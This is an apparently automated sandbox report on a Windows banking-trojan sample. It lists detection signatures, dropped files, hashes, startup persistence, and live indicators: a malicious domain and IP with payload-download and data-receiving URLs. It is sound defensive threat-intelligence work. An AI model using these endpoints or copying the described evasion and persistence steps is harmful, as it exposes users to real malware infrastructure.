behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578840 Sample: RcFBMph6zu.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 36 site.webmailcontabilidadecrx.net 2->36 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for dropped file 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 7 other signatures 2->58 8 RcFBMph6zu.exe 1 2->8         started        11 Nvidia-48001.exe 2->11         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 64 Malicious encrypted Powershell command line found 8->64 66 Encrypted powershell cmdline option found 8->66 68 Bypasses PowerShell execution policy 8->68 16 powershell.exe 44 8->16         started        70 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 11->70 40 site.webmailcontabilidadecrx.net 34.95.215.169, 443, 49737, 49743 GOOGLEUS United States 13->40 42 127.0.0.1 unknown unknown 13->42 signatures6 process7 file8 30 C:30vidia-48001\play.exe, PE32 16->30 dropped 32 C:32vidia-4800132vidia-48001.exe (copy), PE32 16->32 dropped 34 C:\Users\user\AppData\...34vidia-48001.lnk, MS 16->34 dropped 44 Powershell uses Background Intelligent Transfer Service (BITS) 16->44 46 Found suspicious powershell code related to unpacking or dynamic code loading 16->46 48 Loading BitLocker PowerShell Module 16->48 50 Powershell drops PE file 16->50 20 Nvidia-48001.exe 1 16->20         started        24 WmiPrvSE.exe 16->24         started        26 conhost.exe 16->26         started        28 2 other processes 16->28 signatures9 process10 dnsIp11 38 23.94.207.151, 49799, 80 AS-COLOCROSSINGUS United States 20->38 60 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->60 62 Switches to a custom stack to bypass stack traces 20->62 signatures12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
RcFBMph6zu.exe24%VirustotalBrowse
RcFBMph6zu.exe24%ReversingLabs
RcFBMph6zu.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Nvidia-48001\Nvidia-48001.exe (copy)24%ReversingLabsWin32.Trojan.Ousaban
C:\Nvidia-48001\play.exe24%ReversingLabsWin32.Trojan.Ousaban
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
site.webmailcontabilidadecrx.net
34.95.215.169
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zipfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://23.94.207.151/Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C7B000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153575949.0000000001C7E000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153387423.0000000001C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://23.94.207.151/DFNvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C7B000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153575949.0000000001C7E000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153387423.0000000001C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000006.00000003.2258368402.000001C4BC200000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drfalse
                          high
                          http://crl.ver)svchost.exe, 00000006.00000002.3705808908.000001C4BC400000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.indyproject.org/Nvidia-48001.exe, 0000000B.00000003.2644408900.0000000004590000.00000004.00001000.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000B.00000002.2647565835.000000000261B000.00000040.10000000.00040000.00000000.sdmpfalse
                              high
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://site.webmailcontabilidadecrx.net/notafiscal/receive_info.phppowershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://g.live.com/odclientsettings/Prod1C:edb.log.6.drfalse
                                    high
                                    https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zipicesvchost.exe, 00000006.00000002.3706091698.000001C4BC48E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://site.webmailcontabilidadecrx.net:443/notafiscal/download/cat.zipsvchost.exe, 00000006.00000002.3706091698.000001C4BC460000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://site.webmailcontabilidadecrx.net/1003svchost.exe, 00000006.00000002.3706091698.000001C4BC460000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/powershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://23.94.207.151/iF&Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C7B000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153575949.0000000001C7E000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153387423.0000000001C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.4651321766.0000029480001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.microsoft.cpowershell.exe, 00000002.00000002.4742018969.00000294FAC80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.4651321766.0000029480001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://23.94.207.151/avs_pro/index.phpNvidia-48001.exe, 0000000A.00000003.2834676511.0000000001C45000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          23.94.207.151
                                                          unknownUnited States
                                                          36352AS-COLOCROSSINGUSfalse
                                                          34.95.215.169
                                                          site.webmailcontabilidadecrx.netUnited States
                                                          15169GOOGLEUSfalse
                                                          IP
                                                          127.0.0.1
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1578840
                                                          Start date and time:2024-12-20 15:27:11 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 27s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:14
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:RcFBMph6zu.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:7763f41947263d5b64cb49c2178292e26d6c10b033f530435726fa43340468ab.exe
                                                          Detection:MAL
                                                          Classification:mal100.bank.evad.winEXE@13/16@1/3
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 64%
                                                          • Number of executed functions: 16
                                                          • Number of non-executed functions: 12
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240s for powershell
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target RcFBMph6zu.exe, PID 3136 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          TimeTypeDescription
                                                          09:28:14API Interceptor11076087x Sleep call for process: powershell.exe modified
                                                          09:28:19API Interceptor3x Sleep call for process: svchost.exe modified
                                                          09:28:48API Interceptor7877x Sleep call for process: Nvidia-48001.exe modified
                                                          15:28:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-48001.lnk
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          23.94.207.151tTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
                                                          • 23.94.207.151/avs_coin/index.php
                                                          e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
                                                          • 23.94.207.151/avs_pro/index.php
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          AS-COLOCROSSINGUStTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
                                                          • 23.94.207.151
                                                          e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
                                                          • 23.94.207.151
                                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 107.174.209.17
                                                          uctgkfb7.exeGet hashmaliciousXWormBrowse
                                                          • 192.210.175.202
                                                          file.exeGet hashmaliciousRemcosBrowse
                                                          • 107.173.4.16
                                                          SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                          • 192.210.150.17
                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                          • 172.245.123.12
                                                          greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 23.95.235.29
                                                          sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 23.95.235.29
                                                          createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                          • 172.245.123.12
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          28a2c9bd18a11de089ef85a160da29e4http://senalongley.comGet hashmaliciousUnknownBrowse
                                                          • 34.95.215.169
                                                          ghostspider.7zGet hashmaliciousUnknownBrowse
                                                          • 34.95.215.169
                                                          Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                          • 34.95.215.169
                                                          Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                          • 34.95.215.169
                                                          F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                          • 34.95.215.169
                                                          tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                          • 34.95.215.169
                                                          JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                          • 34.95.215.169
                                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                          • 34.95.215.169
                                                          https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                          • 34.95.215.169
                                                          Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                          • 34.95.215.169
                                                          No context
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):8635355
                                                          Entropy (8bit):7.9998512032284195
                                                          Encrypted:true
                                                          SSDEEP:196608:7rj2hoZ9EmTAPP1ZqdCI6EbEWw6kGGW3tk8Y4spTW:7WoZ9EyYZ9ImWopq
                                                          MD5:4FD14CD23A12A7B1A106165A15C57694
                                                          SHA1:8102A8EDB0412DF19C624B1EFDE306456A837826
                                                          SHA-256:5BF7A221A454CC6E6EC1B87D0C370E55C72DA57D3A2635100B5BA84FE6E7D5E3
                                                          SHA-512:7E0EF66E879772CD21A05658EC3F26419A7E3C5334D8FBD1E73BEE69FF45E2466AEA82CF9CF332A3995CB4F9AA125F667179C4A832DD2679FEDCB47BDA42EB68
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:PK........;!.Y*..YE..........play.exe.eT.....3. ....Bp....A......<....{.$h...<$..wKXf..s.}..o..;.@........ye.. .....w...m.......?..Rw..M.c.m.*c..`.7.gW'kW3..s3GG'w...4...46.4.jZ4.N..\88.......*...o...... "`!.2...o....!.'..=...q.`...P..........S..`~...F........_.A........|.....8..g.m.>....o_ub{..2..x._...-.......m....aSM.\-....V....?..>........<.K.^.Z.o...........;..".-....$.=....L.R.?.>.Q....._.....c.?.5 ..d....^p.Z.;...e.../.....'.....'/..5...-|...._.5p./...........+:Lb.U.4.SO~S."t)...&........E._....9..@y.}....5.....h..V}..hL. ...$d^T...~..~.*....C.........0 ......m..H?...p..@.....S!..J.o7.~.|......w..S|.BNH.A.V....B.......p|*~c%...%?...F....T%M....;O.9y.77.4.....Z*..`H....H.V.S.......`W.d....%6.,...XlF..gv.s...(.......i.;pulO...8......~....Q.f..D9..~DX=......M.yy.P...=.xa.....7..$6...Fw..Q.wi.5j..}h._.Ho.U.TN..Y.mGyf..)....Tn...PLjq.g.....vf4_.......k.lt.d.}......%.*...O.{B...R-n.'...^.......F'y.....R{...T.0..t.6`.z....P..qtSdtb).....
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8816544
                                                          Entropy (8bit):7.993493827980054
                                                          Encrypted:true
                                                          SSDEEP:196608:q8NN2mvIbRvnSZkIeQZ8eYMa46OdXxVQIB:qeN2uOnRIIehVQ4
                                                          MD5:D11828146FF9E2E340C555F9531CAC47
                                                          SHA1:CA027CA9BEA1E48A0AC4D01370D3F4BC9D5E5088
                                                          SHA-256:48590573F48E243DEA35B018401933E3B5CBC19EDB94377C7D54394F127E214C
                                                          SHA-512:2305B6B9A5B530651B33958093B96CCDBEE63D03530A082C39C94809278458658FACA472B66A090493928EC26F6E3D28C8BA278FAF6AC9CB7AFC8AB70A918779
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..e...............&.....H......m........ ....@.......................................@.................................8|u......@..y5...........^...)...........................................:..@.............g.0............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....!Zx......f..@...................... ..`.]#m....H.....g.....................@....2"V....`.... g..................... ..`.rsrc...y5...@...6...$..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):8635355
                                                          Entropy (8bit):7.9998512032284195
                                                          Encrypted:true
                                                          SSDEEP:196608:7rj2hoZ9EmTAPP1ZqdCI6EbEWw6kGGW3tk8Y4spTW:7WoZ9EyYZ9ImWopq
                                                          MD5:4FD14CD23A12A7B1A106165A15C57694
                                                          SHA1:8102A8EDB0412DF19C624B1EFDE306456A837826
                                                          SHA-256:5BF7A221A454CC6E6EC1B87D0C370E55C72DA57D3A2635100B5BA84FE6E7D5E3
                                                          SHA-512:7E0EF66E879772CD21A05658EC3F26419A7E3C5334D8FBD1E73BEE69FF45E2466AEA82CF9CF332A3995CB4F9AA125F667179C4A832DD2679FEDCB47BDA42EB68
                                                          Malicious:false
                                                          Preview:PK........;!.Y*..YE..........play.exe.eT.....3. ....Bp....A......<....{.$h...<$..wKXf..s.}..o..;.@........ye.. .....w...m.......?..Rw..M.c.m.*c..`.7.gW'kW3..s3GG'w...4...46.4.jZ4.N..\88.......*...o...... "`!.2...o....!.'..=...q.`...P..........S..`~...F........_.A........|.....8..g.m.>....o_ub{..2..x._...-.......m....aSM.\-....V....?..>........<.K.^.Z.o...........;..".-....$.=....L.R.?.>.Q....._.....c.?.5 ..d....^p.Z.;...e.../.....'.....'/..5...-|...._.5p./...........+:Lb.U.4.SO~S."t)...&........E._....9..@y.}....5.....h..V}..hL. ...$d^T...~..~.*....C.........0 ......m..H?...p..@.....S!..J.o7.~.|......w..S|.BNH.A.V....B.......p|*~c%...%?...F....T%M....;O.9y.77.4.....Z*..`H....H.V.S.......`W.d....%6.,...XlF..gv.s...(.......i.;pulO...8......~....Q.f..D9..~DX=......M.yy.P...=.xa.....7..$6...Fw..Q.wi.5j..}h._.Ho.U.TN..Y.mGyf..)....Tn...PLjq.g.....vf4_.......k.lt.d.}......%.*...O.{B...R-n.'...^.......F'y.....R{...T.0..t.6`.z....P..qtSdtb).....
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8816544
                                                          Entropy (8bit):7.993493827980054
                                                          Encrypted:true
                                                          SSDEEP:196608:q8NN2mvIbRvnSZkIeQZ8eYMa46OdXxVQIB:qeN2uOnRIIehVQ4
                                                          MD5:D11828146FF9E2E340C555F9531CAC47
                                                          SHA1:CA027CA9BEA1E48A0AC4D01370D3F4BC9D5E5088
                                                          SHA-256:48590573F48E243DEA35B018401933E3B5CBC19EDB94377C7D54394F127E214C
                                                          SHA-512:2305B6B9A5B530651B33958093B96CCDBEE63D03530A082C39C94809278458658FACA472B66A090493928EC26F6E3D28C8BA278FAF6AC9CB7AFC8AB70A918779
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..e...............&.....H......m........ ....@.......................................@.................................8|u......@..y5...........^...)...........................................:..@.............g.0............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....!Zx......f..@...................... ..`.]#m....H.....g.....................@....2"V....`.... g..................... ..`.rsrc...y5...@...6...$..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8192
                                                          Entropy (8bit):0.35999246155449205
                                                          Encrypted:false
                                                          SSDEEP:6:6xNoaaD0JOCEfMuaaD0JOCEfMKQmDmxNoaaD0JOCEfMuaaD0JOCEfMKQmD:HaaD0JcaaD0JwQQzaaD0JcaaD0JwQQ
                                                          MD5:247B919FE91944A8F0F42F4D079F6E1E
                                                          SHA1:697E2C22AC489E20FC5D3809A5552CC2DB30C0C1
                                                          SHA-256:57D0A4F0C75E0516F650A83A1C4CA590CEF68985B639B48F8924487287088387
                                                          SHA-512:C1FB72FDBBDFBAF9D487B2E9069BCD20286588EA21B6118CB6076C7B3F826F46D97431463BF1D42C23E30BD6055644FEDE46997162F7349DCA99C8594E1A48C3
                                                          Malicious:false
                                                          Preview:*.>...........p.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................p.............................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.7523449608977506
                                                          Encrypted:false
                                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0f:9JZj5MiKNnNhoxuu
                                                          MD5:AE4F63CA57E745E37CB1330C27CF4B30
                                                          SHA1:C5CED7298BB7E6BBFBE00228083D1419D2806B76
                                                          SHA-256:8F75A5722AA1D39799015C8BBD15CC678D5FA42F2D126C546FF449C6810A989D
                                                          SHA-512:756304BC6118BE839E7A39ACACB47CF2D5294346AFA221ED0820E15E291287A6F515A081A331C0B157CCB3B036F3B95CAD96138AFB82AD7F2A82D62F9E3BCF84
                                                          Malicious:false
                                                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x357f6386, page size 16384, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.6293258323378529
                                                          Encrypted:false
                                                          SSDEEP:1536:1SB2ESB2SSjlK/ztH03N9Jgy88Ykr3g16X2UPkLk+kjWyrufTRryrUtOLUzCJ:1azapOPqw2UtmOYtOL
                                                          MD5:47C8D1EE05FE42407434F03FCA77C2D2
                                                          SHA1:B53FBC6FA66419FE077795CEEB0FA646508E6840
                                                          SHA-256:C9F28639B40A709FD9E12C62465553FC3F2B94D42AA337C7D985C480B0B1B3DA
                                                          SHA-512:4189C27669080E8A71F0195ED5ED5E20CD6F654A6220A41721D4EC9D091A4EB0871238C5D82B51C4687AF623192E5E8472DA29E948F3C98974BEAE3B67F7ADF3
                                                          Malicious:false
                                                          Preview:5.c.... .......h.......X\...;...{......................0.o..........|_......|i.h.g..........|_.0.o.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................."......|_.................;b.......|_..........................#......0.o.....................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.0790736487305746
                                                          Encrypted:false
                                                          SSDEEP:3:blKOetYeBMpU36rt/Br5rfIoU3arllO5AxpErt/alleF1lZMPCyH:BKrzBMiwL1w+/HvCQ2B
                                                          MD5:A70F10999730EBD14FBD87A62F949098
                                                          SHA1:83D11DE7EF9195620620687B780B59F44543EF00
                                                          SHA-256:23084DCCF4AAB26AAFAE5B54EB01528B11C873D8A227BEDA7BBAA63628B2A0E3
                                                          SHA-512:4060F1BE148DB5E2EBADC2351151D880EE80CDD6C2FB317A337389235FE396F37AE2F35ABF5CCF9429D252E426DCC28E42AC7A21D2CF0F72FBB5B4CFF123D6E3
                                                          Malicious:false
                                                          Preview:.!.Z.....................................;...{.......|i......|_..............|.......|_.z..).....|?.................;b.......|_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):38390
                                                          Entropy (8bit):5.059494658614309
                                                          Encrypted:false
                                                          SSDEEP:768:/dbV3IpNBQkj2Uh4iUx1frRJv5FPvlOZhK/bardF9JQOdB4tAHkLNZzNKe1MlYod:/dbV3CNBQkj2Uh4iUx1flJnPvlO2qd/p
                                                          MD5:A6E5F55E307AD7AAB1BAC2A9EEB35EC4
                                                          SHA1:4062EA42C9455900824E410BFDDB8F4AE64A67B9
                                                          SHA-256:BC4EF14D8847B6F788C9345B42E2E3800F921FD0904AB3FA7C2F6F5C0635F9C1
                                                          SHA-512:B9DA8DE97468EE08D66C7378E35A8AB64769A9EAF32F5695C493241AB2BD800A7B119E179DFD9D31BB7BCCDE8C12D5419E3A77E79BE5866C81C6FD8B8A3F2D36
                                                          Malicious:false
                                                          Preview:PSMODULECACHE.7...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
